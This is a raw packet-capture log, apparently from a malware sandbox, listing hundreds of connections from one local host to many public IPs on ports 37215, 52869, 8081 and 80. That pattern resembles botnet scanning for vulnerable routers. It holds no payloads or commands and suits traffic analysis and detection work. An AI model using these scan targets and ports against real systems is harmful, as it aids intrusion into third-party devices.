                                                Jul 20, 2024 23:05:33.320571899 CEST808150110197.160.53.246192.168.2.14
                                                Jul 20, 2024 23:05:33.320621014 CEST501108081192.168.2.14197.160.53.246
                                                Jul 20, 2024 23:05:33.322926044 CEST3611680192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.323030949 CEST372153939641.248.125.74192.168.2.14
                                                Jul 20, 2024 23:05:33.323090076 CEST3939637215192.168.2.1441.248.125.74
                                                Jul 20, 2024 23:05:33.323888063 CEST525968081192.168.2.1499.244.224.1
                                                Jul 20, 2024 23:05:33.325287104 CEST4000837215192.168.2.14133.28.220.100
                                                Jul 20, 2024 23:05:33.326471090 CEST4158652869192.168.2.14103.132.88.33
                                                Jul 20, 2024 23:05:33.327863932 CEST803611695.234.250.137192.168.2.14
                                                Jul 20, 2024 23:05:33.327934027 CEST3611680192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.328731060 CEST80815259699.244.224.1192.168.2.14
                                                Jul 20, 2024 23:05:33.329376936 CEST525968081192.168.2.1499.244.224.1
                                                Jul 20, 2024 23:05:33.329914093 CEST4706680192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.330147982 CEST3721540008133.28.220.100192.168.2.14
                                                Jul 20, 2024 23:05:33.330452919 CEST4000837215192.168.2.14133.28.220.100
                                                Jul 20, 2024 23:05:33.330636978 CEST346028081192.168.2.1435.119.194.71
                                                Jul 20, 2024 23:05:33.331398964 CEST5286941586103.132.88.33192.168.2.14
                                                Jul 20, 2024 23:05:33.331482887 CEST4642837215192.168.2.1441.70.140.218
                                                Jul 20, 2024 23:05:33.331563950 CEST4158652869192.168.2.14103.132.88.33
                                                Jul 20, 2024 23:05:33.334849119 CEST804706695.191.67.246192.168.2.14
                                                Jul 20, 2024 23:05:33.334923029 CEST4706680192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.335455894 CEST80813460235.119.194.71192.168.2.14
                                                Jul 20, 2024 23:05:33.335495949 CEST346028081192.168.2.1435.119.194.71
                                                Jul 20, 2024 23:05:33.336390972 CEST372154642841.70.140.218192.168.2.14
                                                Jul 20, 2024 23:05:33.336461067 CEST4642837215192.168.2.1441.70.140.218
                                                Jul 20, 2024 23:05:33.339114904 CEST5888880192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:33.339601040 CEST420908081192.168.2.1464.11.70.189
                                                Jul 20, 2024 23:05:33.340512037 CEST3617437215192.168.2.14157.58.89.166
                                                Jul 20, 2024 23:05:33.343622923 CEST5120252869192.168.2.14154.57.81.200
                                                Jul 20, 2024 23:05:33.344070911 CEST805888895.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:33.344243050 CEST5888880192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:33.344561100 CEST80814209064.11.70.189192.168.2.14
                                                Jul 20, 2024 23:05:33.344625950 CEST420908081192.168.2.1464.11.70.189
                                                Jul 20, 2024 23:05:33.345349073 CEST3721536174157.58.89.166192.168.2.14
                                                Jul 20, 2024 23:05:33.345666885 CEST3617437215192.168.2.14157.58.89.166
                                                Jul 20, 2024 23:05:33.346987963 CEST4204280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.347397089 CEST503528081192.168.2.1490.90.218.17
                                                Jul 20, 2024 23:05:33.347631931 CEST5355037215192.168.2.14157.198.219.2
                                                Jul 20, 2024 23:05:33.349133968 CEST5286951202154.57.81.200192.168.2.14
                                                Jul 20, 2024 23:05:33.349189997 CEST5120252869192.168.2.14154.57.81.200
                                                Jul 20, 2024 23:05:33.353429079 CEST804204295.122.145.119192.168.2.14
                                                Jul 20, 2024 23:05:33.353483915 CEST4204280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.353485107 CEST4713280192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.353918076 CEST80815035290.90.218.17192.168.2.14
                                                Jul 20, 2024 23:05:33.353919029 CEST507748081192.168.2.1489.204.254.142
                                                Jul 20, 2024 23:05:33.354024887 CEST503528081192.168.2.1490.90.218.17
                                                Jul 20, 2024 23:05:33.354114056 CEST5836052869192.168.2.14137.134.252.4
                                                Jul 20, 2024 23:05:33.354156017 CEST3721553550157.198.219.2192.168.2.14
                                                Jul 20, 2024 23:05:33.354249001 CEST5355037215192.168.2.14157.198.219.2
                                                Jul 20, 2024 23:05:33.354373932 CEST4655637215192.168.2.14152.41.190.171
                                                Jul 20, 2024 23:05:33.360660076 CEST5012480192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.361094952 CEST344368081192.168.2.1480.161.237.245
                                                Jul 20, 2024 23:05:33.361390114 CEST3280437215192.168.2.1494.44.111.34
                                                Jul 20, 2024 23:05:33.363878012 CEST804713295.219.116.49192.168.2.14
                                                Jul 20, 2024 23:05:33.364006996 CEST4713280192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.364315033 CEST80815077489.204.254.142192.168.2.14
                                                Jul 20, 2024 23:05:33.364367962 CEST5286958360137.134.252.4192.168.2.14
                                                Jul 20, 2024 23:05:33.364388943 CEST507748081192.168.2.1489.204.254.142
                                                Jul 20, 2024 23:05:33.364417076 CEST5836052869192.168.2.14137.134.252.4
                                                Jul 20, 2024 23:05:33.364598989 CEST3721546556152.41.190.171192.168.2.14
                                                Jul 20, 2024 23:05:33.364861012 CEST4655637215192.168.2.14152.41.190.171
                                                Jul 20, 2024 23:05:33.366729975 CEST5443452869192.168.2.14162.190.144.241
                                                Jul 20, 2024 23:05:33.368732929 CEST4153680192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.369729996 CEST344808081192.168.2.14125.204.49.213
                                                Jul 20, 2024 23:05:33.370090008 CEST4349437215192.168.2.1441.146.165.184
                                                Jul 20, 2024 23:05:33.371855974 CEST805012495.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:33.372049093 CEST80813443680.161.237.245192.168.2.14
                                                Jul 20, 2024 23:05:33.372073889 CEST5012480192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.372123957 CEST344368081192.168.2.1480.161.237.245
                                                Jul 20, 2024 23:05:33.372356892 CEST372153280494.44.111.34192.168.2.14
                                                Jul 20, 2024 23:05:33.372417927 CEST3280437215192.168.2.1494.44.111.34
                                                Jul 20, 2024 23:05:33.376467943 CEST5699037215192.168.2.14197.153.130.241
                                                Jul 20, 2024 23:05:33.376621962 CEST5700280192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.377068996 CEST430908081192.168.2.144.188.104.13
                                                Jul 20, 2024 23:05:33.377726078 CEST5286954434162.190.144.241192.168.2.14
                                                Jul 20, 2024 23:05:33.377768040 CEST5443452869192.168.2.14162.190.144.241
                                                Jul 20, 2024 23:05:33.379194975 CEST804153695.255.231.56192.168.2.14
                                                Jul 20, 2024 23:05:33.379292011 CEST4153680192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.379829884 CEST808134480125.204.49.213192.168.2.14
                                                Jul 20, 2024 23:05:33.379832983 CEST4514252869192.168.2.1496.209.69.20
                                                Jul 20, 2024 23:05:33.379894018 CEST344808081192.168.2.14125.204.49.213
                                                Jul 20, 2024 23:05:33.379941940 CEST372154349441.146.165.184192.168.2.14
                                                Jul 20, 2024 23:05:33.380002975 CEST4349437215192.168.2.1441.146.165.184
                                                Jul 20, 2024 23:05:33.381417990 CEST5390637215192.168.2.14197.187.231.237
                                                Jul 20, 2024 23:05:33.381550074 CEST3795080192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.381973982 CEST572788081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:33.384838104 CEST3721556990197.153.130.241192.168.2.14
                                                Jul 20, 2024 23:05:33.384880066 CEST5699037215192.168.2.14197.153.130.241
                                                Jul 20, 2024 23:05:33.385051012 CEST805700295.81.227.113192.168.2.14
                                                Jul 20, 2024 23:05:33.385113955 CEST5700280192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.385437012 CEST437868081192.168.2.14216.109.199.249
                                                Jul 20, 2024 23:05:33.385437965 CEST437868081192.168.2.14216.109.199.249
                                                Jul 20, 2024 23:05:33.385756969 CEST8081430904.188.104.13192.168.2.14
                                                Jul 20, 2024 23:05:33.385838032 CEST430908081192.168.2.144.188.104.13
                                                Jul 20, 2024 23:05:33.386689901 CEST528694514296.209.69.20192.168.2.14
                                                Jul 20, 2024 23:05:33.386790991 CEST4514252869192.168.2.1496.209.69.20
                                                Jul 20, 2024 23:05:33.387785912 CEST5081837215192.168.2.14157.182.246.174
                                                Jul 20, 2024 23:05:33.387854099 CEST3721553906197.187.231.237192.168.2.14
                                                Jul 20, 2024 23:05:33.387861013 CEST803795095.159.5.85192.168.2.14
                                                Jul 20, 2024 23:05:33.387866974 CEST80815727887.232.28.113192.168.2.14
                                                Jul 20, 2024 23:05:33.387892008 CEST5390637215192.168.2.14197.187.231.237
                                                Jul 20, 2024 23:05:33.387933016 CEST3795080192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.387962103 CEST572788081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:33.388062000 CEST4330080192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.388619900 CEST441488081192.168.2.14216.109.199.249
                                                Jul 20, 2024 23:05:33.390585899 CEST808143786216.109.199.249192.168.2.14
                                                Jul 20, 2024 23:05:33.392113924 CEST5367652869192.168.2.14121.248.9.74
                                                Jul 20, 2024 23:05:33.392879009 CEST3721550818157.182.246.174192.168.2.14
                                                Jul 20, 2024 23:05:33.392961025 CEST5081837215192.168.2.14157.182.246.174
                                                Jul 20, 2024 23:05:33.393069983 CEST804330095.183.13.8192.168.2.14
                                                Jul 20, 2024 23:05:33.393213034 CEST4330080192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.393517971 CEST808144148216.109.199.249192.168.2.14
                                                Jul 20, 2024 23:05:33.393577099 CEST441488081192.168.2.14216.109.199.249
                                                Jul 20, 2024 23:05:33.393894911 CEST415688081192.168.2.14217.229.232.132
                                                Jul 20, 2024 23:05:33.393894911 CEST415688081192.168.2.14217.229.232.132
                                                Jul 20, 2024 23:05:33.394249916 CEST4423037215192.168.2.14157.18.39.4
                                                Jul 20, 2024 23:05:33.396085978 CEST6079280192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:33.397051096 CEST5286953676121.248.9.74192.168.2.14
                                                Jul 20, 2024 23:05:33.397106886 CEST5367652869192.168.2.14121.248.9.74
                                                Jul 20, 2024 23:05:33.397157907 CEST419328081192.168.2.14217.229.232.132
                                                Jul 20, 2024 23:05:33.398797035 CEST808141568217.229.232.132192.168.2.14
                                                Jul 20, 2024 23:05:33.399101973 CEST3721544230157.18.39.4192.168.2.14
                                                Jul 20, 2024 23:05:33.399156094 CEST4423037215192.168.2.14157.18.39.4
                                                Jul 20, 2024 23:05:33.399827003 CEST3431680192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.400645018 CEST587428081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.400645018 CEST587428081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.400943995 CEST806079295.224.183.85192.168.2.14
                                                Jul 20, 2024 23:05:33.401532888 CEST6079280192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:33.401588917 CEST4925237215192.168.2.14157.148.29.80
                                                Jul 20, 2024 23:05:33.401935101 CEST808141932217.229.232.132192.168.2.14
                                                Jul 20, 2024 23:05:33.402420998 CEST419328081192.168.2.14217.229.232.132
                                                Jul 20, 2024 23:05:33.404714108 CEST591068081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.404758930 CEST803431695.63.149.249192.168.2.14
                                                Jul 20, 2024 23:05:33.404815912 CEST3431680192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.404906988 CEST4843252869192.168.2.1451.192.83.103
                                                Jul 20, 2024 23:05:33.405550957 CEST808158742117.202.144.121192.168.2.14
                                                Jul 20, 2024 23:05:33.406518936 CEST3721549252157.148.29.80192.168.2.14
                                                Jul 20, 2024 23:05:33.406790972 CEST4925237215192.168.2.14157.148.29.80
                                                Jul 20, 2024 23:05:33.408557892 CEST3969480192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.409284115 CEST437108081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.409284115 CEST437108081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.409662962 CEST808159106117.202.144.121192.168.2.14
                                                Jul 20, 2024 23:05:33.409728050 CEST528694843251.192.83.103192.168.2.14
                                                Jul 20, 2024 23:05:33.409728050 CEST5092637215192.168.2.1418.5.132.170
                                                Jul 20, 2024 23:05:33.409770966 CEST591068081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.409784079 CEST4843252869192.168.2.1451.192.83.103
                                                Jul 20, 2024 23:05:33.412508011 CEST440748081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.413733959 CEST803969495.67.19.107192.168.2.14
                                                Jul 20, 2024 23:05:33.413778067 CEST3969480192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.414103985 CEST808143710107.98.138.138192.168.2.14
                                                Jul 20, 2024 23:05:33.414640903 CEST372155092618.5.132.170192.168.2.14
                                                Jul 20, 2024 23:05:33.415329933 CEST5092637215192.168.2.1418.5.132.170
                                                Jul 20, 2024 23:05:33.416609049 CEST3356880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.417083025 CEST481848081192.168.2.14122.148.141.139
                                                Jul 20, 2024 23:05:33.417083025 CEST481848081192.168.2.14122.148.141.139
                                                Jul 20, 2024 23:05:33.417383909 CEST5524237215192.168.2.1441.189.66.95
                                                Jul 20, 2024 23:05:33.417526007 CEST808144074107.98.138.138192.168.2.14
                                                Jul 20, 2024 23:05:33.417661905 CEST440748081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.418576002 CEST3619452869192.168.2.14148.30.198.131
                                                Jul 20, 2024 23:05:33.420593977 CEST485508081192.168.2.14122.148.141.139
                                                Jul 20, 2024 23:05:33.421480894 CEST803356895.101.7.150192.168.2.14
                                                Jul 20, 2024 23:05:33.421546936 CEST3356880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.421845913 CEST808148184122.148.141.139192.168.2.14
                                                Jul 20, 2024 23:05:33.422224045 CEST372155524241.189.66.95192.168.2.14
                                                Jul 20, 2024 23:05:33.423064947 CEST5524237215192.168.2.1441.189.66.95
                                                Jul 20, 2024 23:05:33.423465014 CEST5271080192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.423490047 CEST5286936194148.30.198.131192.168.2.14
                                                Jul 20, 2024 23:05:33.423547983 CEST3619452869192.168.2.14148.30.198.131
                                                Jul 20, 2024 23:05:33.424062967 CEST349288081192.168.2.14124.0.116.151
                                                Jul 20, 2024 23:05:33.424062967 CEST349288081192.168.2.14124.0.116.151
                                                Jul 20, 2024 23:05:33.424468994 CEST5816037215192.168.2.14197.90.229.28
                                                Jul 20, 2024 23:05:33.425508976 CEST808148550122.148.141.139192.168.2.14
                                                Jul 20, 2024 23:05:33.425590038 CEST485508081192.168.2.14122.148.141.139
                                                Jul 20, 2024 23:05:33.428409100 CEST805271095.214.176.104192.168.2.14
                                                Jul 20, 2024 23:05:33.428468943 CEST5271080192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.428514957 CEST352948081192.168.2.14124.0.116.151
                                                Jul 20, 2024 23:05:33.428852081 CEST808134928124.0.116.151192.168.2.14
                                                Jul 20, 2024 23:05:33.429291964 CEST3721558160197.90.229.28192.168.2.14
                                                Jul 20, 2024 23:05:33.429418087 CEST5816037215192.168.2.14197.90.229.28
                                                Jul 20, 2024 23:05:33.430794001 CEST5752237215192.168.2.14197.125.116.0
                                                Jul 20, 2024 23:05:33.431133986 CEST5651880192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:33.431848049 CEST572128081192.168.2.14173.99.45.184
                                                Jul 20, 2024 23:05:33.431848049 CEST572128081192.168.2.14173.99.45.184
                                                Jul 20, 2024 23:05:33.431968927 CEST3761052869192.168.2.1475.120.116.239
                                                Jul 20, 2024 23:05:33.433274031 CEST808143786216.109.199.249192.168.2.14
                                                Jul 20, 2024 23:05:33.433670044 CEST808135294124.0.116.151192.168.2.14
                                                Jul 20, 2024 23:05:33.433758020 CEST352948081192.168.2.14124.0.116.151
                                                Jul 20, 2024 23:05:33.434945107 CEST575768081192.168.2.14173.99.45.184
                                                Jul 20, 2024 23:05:33.435841084 CEST3721557522197.125.116.0192.168.2.14
                                                Jul 20, 2024 23:05:33.435899019 CEST5752237215192.168.2.14197.125.116.0
                                                Jul 20, 2024 23:05:33.436630011 CEST5949237215192.168.2.14157.208.177.172
                                                Jul 20, 2024 23:05:33.436741114 CEST805651895.216.245.126192.168.2.14
                                                Jul 20, 2024 23:05:33.436817884 CEST5651880192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:33.436898947 CEST4092680192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.437082052 CEST808157212173.99.45.184192.168.2.14
                                                Jul 20, 2024 23:05:33.437088013 CEST528693761075.120.116.239192.168.2.14
                                                Jul 20, 2024 23:05:33.437133074 CEST3761052869192.168.2.1475.120.116.239
                                                Jul 20, 2024 23:05:33.439333916 CEST581088081192.168.2.14213.86.105.34
                                                Jul 20, 2024 23:05:33.439333916 CEST581088081192.168.2.14213.86.105.34
                                                Jul 20, 2024 23:05:33.439805031 CEST808157576173.99.45.184192.168.2.14
                                                Jul 20, 2024 23:05:33.439904928 CEST575768081192.168.2.14173.99.45.184
                                                Jul 20, 2024 23:05:33.441370010 CEST808141568217.229.232.132192.168.2.14
                                                Jul 20, 2024 23:05:33.441445112 CEST3721559492157.208.177.172192.168.2.14
                                                Jul 20, 2024 23:05:33.441494942 CEST5949237215192.168.2.14157.208.177.172
                                                Jul 20, 2024 23:05:33.441633940 CEST8040926112.91.135.215192.168.2.14
                                                Jul 20, 2024 23:05:33.441721916 CEST4092680192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.442054987 CEST584748081192.168.2.14213.86.105.34
                                                Jul 20, 2024 23:05:33.442636013 CEST3313237215192.168.2.14157.124.133.127
                                                Jul 20, 2024 23:05:33.443681002 CEST4901252869192.168.2.14101.86.111.6
                                                Jul 20, 2024 23:05:33.444004059 CEST3452280192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:33.444195032 CEST808158108213.86.105.34192.168.2.14
                                                Jul 20, 2024 23:05:33.444596052 CEST598728081192.168.2.14124.201.188.99
                                                Jul 20, 2024 23:05:33.444596052 CEST598728081192.168.2.14124.201.188.99
                                                Jul 20, 2024 23:05:33.446832895 CEST808158474213.86.105.34192.168.2.14
                                                Jul 20, 2024 23:05:33.447062016 CEST5407480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.447062016 CEST5407480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.447098970 CEST584748081192.168.2.14213.86.105.34
                                                Jul 20, 2024 23:05:33.447455883 CEST3721533132157.124.133.127192.168.2.14
                                                Jul 20, 2024 23:05:33.447520971 CEST3313237215192.168.2.14157.124.133.127
                                                Jul 20, 2024 23:05:33.447630882 CEST602388081192.168.2.14124.201.188.99
                                                Jul 20, 2024 23:05:33.447813034 CEST4472237215192.168.2.14157.96.246.174
                                                Jul 20, 2024 23:05:33.448796988 CEST5286949012101.86.111.6192.168.2.14
                                                Jul 20, 2024 23:05:33.449073076 CEST4901252869192.168.2.14101.86.111.6
                                                Jul 20, 2024 23:05:33.449321985 CEST8034522112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:33.449327946 CEST808158742117.202.144.121192.168.2.14
                                                Jul 20, 2024 23:05:33.449342966 CEST808159872124.201.188.99192.168.2.14
                                                Jul 20, 2024 23:05:33.449381113 CEST3452280192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:33.449712992 CEST5449480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.450433016 CEST575648081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.450433016 CEST575648081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.452025890 CEST805407495.17.124.99192.168.2.14
                                                Jul 20, 2024 23:05:33.452665091 CEST808160238124.201.188.99192.168.2.14
                                                Jul 20, 2024 23:05:33.452771902 CEST602388081192.168.2.14124.201.188.99
                                                Jul 20, 2024 23:05:33.452902079 CEST3721544722157.96.246.174192.168.2.14
                                                Jul 20, 2024 23:05:33.452939987 CEST4472237215192.168.2.14157.96.246.174
                                                Jul 20, 2024 23:05:33.453732014 CEST3763280192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:33.453732014 CEST3763280192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:33.454174042 CEST579308081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.454477072 CEST3403252869192.168.2.1441.109.181.54
                                                Jul 20, 2024 23:05:33.454582930 CEST4467037215192.168.2.14128.4.57.232
                                                Jul 20, 2024 23:05:33.454586983 CEST805449495.17.124.99192.168.2.14
                                                Jul 20, 2024 23:05:33.454631090 CEST5449480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.455316067 CEST80815756414.227.196.59192.168.2.14
                                                Jul 20, 2024 23:05:33.456510067 CEST3805080192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:33.456998110 CEST808143710107.98.138.138192.168.2.14
                                                Jul 20, 2024 23:05:33.457031965 CEST564708081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.457031965 CEST564708081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.458574057 CEST803763295.119.118.209192.168.2.14
                                                Jul 20, 2024 23:05:33.459045887 CEST80815793014.227.196.59192.168.2.14
                                                Jul 20, 2024 23:05:33.459112883 CEST579308081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.459249973 CEST528693403241.109.181.54192.168.2.14
                                                Jul 20, 2024 23:05:33.459280014 CEST3466280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.459280014 CEST3466280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.459314108 CEST3403252869192.168.2.1441.109.181.54
                                                Jul 20, 2024 23:05:33.459358931 CEST3721544670128.4.57.232192.168.2.14
                                                Jul 20, 2024 23:05:33.459511995 CEST4467037215192.168.2.14128.4.57.232
                                                Jul 20, 2024 23:05:33.459887981 CEST568368081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.460669994 CEST5127237215192.168.2.14157.194.67.142
                                                Jul 20, 2024 23:05:33.461429119 CEST803805095.119.118.209192.168.2.14
                                                Jul 20, 2024 23:05:33.461863041 CEST808156470154.14.145.41192.168.2.14
                                                Jul 20, 2024 23:05:33.462774992 CEST3805080192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:33.464020014 CEST803466295.59.134.24192.168.2.14
                                                Jul 20, 2024 23:05:33.464066982 CEST3508280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.464610100 CEST511848081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.464610100 CEST511848081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.465599060 CEST808148184122.148.141.139192.168.2.14
                                                Jul 20, 2024 23:05:33.465619087 CEST808156836154.14.145.41192.168.2.14
                                                Jul 20, 2024 23:05:33.465686083 CEST568368081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.465711117 CEST3721551272157.194.67.142192.168.2.14
                                                Jul 20, 2024 23:05:33.465781927 CEST5127237215192.168.2.14157.194.67.142
                                                Jul 20, 2024 23:05:33.465981960 CEST4898252869192.168.2.1440.31.56.204
                                                Jul 20, 2024 23:05:33.466471910 CEST3784480192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.466471910 CEST3784480192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.466932058 CEST515488081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.467159033 CEST4530037215192.168.2.14157.204.130.3
                                                Jul 20, 2024 23:05:33.468600035 CEST3826280192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.469005108 CEST803508295.59.134.24192.168.2.14
                                                Jul 20, 2024 23:05:33.469094038 CEST3508280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.469352961 CEST516628081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.469352961 CEST516628081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.469536066 CEST80815118472.133.157.196192.168.2.14
                                                Jul 20, 2024 23:05:33.470843077 CEST528694898240.31.56.204192.168.2.14
                                                Jul 20, 2024 23:05:33.470887899 CEST3458637215192.168.2.14155.178.232.143
                                                Jul 20, 2024 23:05:33.470911980 CEST4898252869192.168.2.1440.31.56.204
                                                Jul 20, 2024 23:05:33.471299887 CEST3720480192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.471299887 CEST3720480192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.471596003 CEST803784495.189.164.11192.168.2.14
                                                Jul 20, 2024 23:05:33.471712112 CEST520308081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.471921921 CEST80815154872.133.157.196192.168.2.14
                                                Jul 20, 2024 23:05:33.471976995 CEST515488081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.472160101 CEST3721545300157.204.130.3192.168.2.14
                                                Jul 20, 2024 23:05:33.472362041 CEST4530037215192.168.2.14157.204.130.3
                                                Jul 20, 2024 23:05:33.473526001 CEST803826295.189.164.11192.168.2.14
                                                Jul 20, 2024 23:05:33.473645926 CEST3826280192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.474534988 CEST808151662117.59.50.117192.168.2.14
                                                Jul 20, 2024 23:05:33.475290060 CEST3762080192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.475994110 CEST3721534586155.178.232.143192.168.2.14
                                                Jul 20, 2024 23:05:33.476099968 CEST3458637215192.168.2.14155.178.232.143
                                                Jul 20, 2024 23:05:33.476165056 CEST803720495.61.168.150192.168.2.14
                                                Jul 20, 2024 23:05:33.476233006 CEST453068081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.476233006 CEST453068081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.476383924 CEST3359852869192.168.2.14189.230.165.186
                                                Jul 20, 2024 23:05:33.476625919 CEST808152030117.59.50.117192.168.2.14
                                                Jul 20, 2024 23:05:33.476723909 CEST520308081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.476957083 CEST808134928124.0.116.151192.168.2.14
                                                Jul 20, 2024 23:05:33.478043079 CEST5817437215192.168.2.14138.194.165.219
                                                Jul 20, 2024 23:05:33.478488922 CEST5620080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.478488922 CEST5620080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.478852034 CEST456748081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.480298996 CEST803762095.61.168.150192.168.2.14
                                                Jul 20, 2024 23:05:33.480370998 CEST3762080192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.480499983 CEST5662080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.481266022 CEST405628081192.168.2.1419.66.111.46
                                                Jul 20, 2024 23:05:33.481266022 CEST405628081192.168.2.1419.66.111.46
                                                Jul 20, 2024 23:05:33.481621027 CEST4020237215192.168.2.14157.157.49.65
                                                Jul 20, 2024 23:05:33.482112885 CEST808145306141.98.245.55192.168.2.14
                                                Jul 20, 2024 23:05:33.482119083 CEST5286933598189.230.165.186192.168.2.14
                                                Jul 20, 2024 23:05:33.482214928 CEST3359852869192.168.2.14189.230.165.186
                                                Jul 20, 2024 23:05:33.482899904 CEST3721558174138.194.165.219192.168.2.14
                                                Jul 20, 2024 23:05:33.483019114 CEST5817437215192.168.2.14138.194.165.219
                                                Jul 20, 2024 23:05:33.483443975 CEST805620095.100.201.122192.168.2.14
                                                Jul 20, 2024 23:05:33.483776093 CEST808145674141.98.245.55192.168.2.14
                                                Jul 20, 2024 23:05:33.484107018 CEST456748081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.484359026 CEST4575880192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.484359026 CEST4575880192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.484724998 CEST409288081192.168.2.1419.66.111.46
                                                Jul 20, 2024 23:05:33.484998941 CEST808157212173.99.45.184192.168.2.14
                                                Jul 20, 2024 23:05:33.485018969 CEST808158108213.86.105.34192.168.2.14
                                                Jul 20, 2024 23:05:33.485430002 CEST805662095.100.201.122192.168.2.14
                                                Jul 20, 2024 23:05:33.485548019 CEST5662080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.486126900 CEST5609652869192.168.2.144.162.121.105
                                                Jul 20, 2024 23:05:33.486219883 CEST80814056219.66.111.46192.168.2.14
                                                Jul 20, 2024 23:05:33.486576080 CEST3721540202157.157.49.65192.168.2.14
                                                Jul 20, 2024 23:05:33.486732960 CEST4020237215192.168.2.14157.157.49.65
                                                Jul 20, 2024 23:05:33.486735106 CEST4617680192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.487608910 CEST368948081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.487608910 CEST368948081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.487900019 CEST3364037215192.168.2.14197.223.52.137
                                                Jul 20, 2024 23:05:33.489227057 CEST804575895.236.83.119192.168.2.14
